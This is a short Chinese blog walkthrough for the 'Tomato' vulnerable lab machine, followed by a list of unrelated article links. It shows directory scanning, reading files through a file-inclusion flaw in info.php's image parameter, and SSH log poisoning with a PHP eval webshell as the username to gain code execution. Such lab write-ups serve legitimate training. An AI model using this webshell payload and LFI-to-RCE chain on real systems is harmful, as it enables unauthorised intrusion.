当前位置: 首页 > article >正文

Tomato靶机通关攻略

步骤一:进行端口扫描,找寻靶机地址

步骤二:访问靶机地址

步骤三:利用dirb进行扫描

得出:/antibot_image/进行访问

步骤四:进入antibots->info.php->右击进入页面源代码->发现存在文件包含漏洞

步骤五:页面通过image传参查看passwd文件

步骤六:页面通过image传参查看日志文件

/antibot_image/antibots/info.php?image=var/log/auth.log

步骤七:将一句话木马作为ssh登录的用户名登录

ssh '<?php phpinfo();eval($_POST["cmd"]);?>'@172.16.1.113 -p 2211

密码随便输,输三次

步骤八:蚁剑连接


http://www.kler.cn/a/291479.html

相关文章:

  • Java预加载
  • 【论文阅读笔记】Scalable, Detailed and Mask-Free Universal Photometric Stereo
  • Mac上Stable Diffusion的环境搭建(还算比较简单)
  • Node.js 工具:在 Windows 11 中配置 Node.js 的详细步骤
  • x86_64 Ubuntu 编译安装英伟达GPU版本的OpenCV
  • 极狐GitLab 17.7正式发布,可从 GitLab 丝滑迁移至极狐GitLab【一】
  • sci文章录用后能要求删除其中一位作者吗?
  • 【Linux】在 bash shell 环境下,当一命令正在执行时,按下 control-Z 会?
  • [Java]SpringBoot业务代码增强
  • # 利刃出鞘_Tomcat 核心原理解析(十)-- Tomcat 性能调优--1
  • 微信公众号《GIS 数据工程:开始您的 ETL 之旅 》 文章删除及原因
  • okhttp,retrofit,rxjava 是如何配合工作的 作用分别是什么
  • Eureka:Spring Cloud中的服务注册与发现如何实现?
  • 数据结构(邓俊辉)学习笔记】串 16——Karp-Rabin算法:串即是数
  • 9:00面试,9:08就出来了,问的问题有点变态。。。
  • 九、制作卡牌预制体
  • 【深度学习】yolov8的微调
  • Android framework 编程之 - Binder调用方UID
  • CSS基础 --- % 相对于谁
  • 斯坦福UE4 C++课学习补充21:击败动画
  • Snipaste:一款强大的截图与贴图工具
  • 汽车电子行业知识:什么是车辆定位技术
  • UNIX及UNIX-like环境下的调试工具gdb使用方法
  • 【排序算法】快速排序升级版--三路快排详解 + 实现(c语言)
  • ES之三:springboot集成ES
  • Django+Vue家居全屋定制系统的设计与实现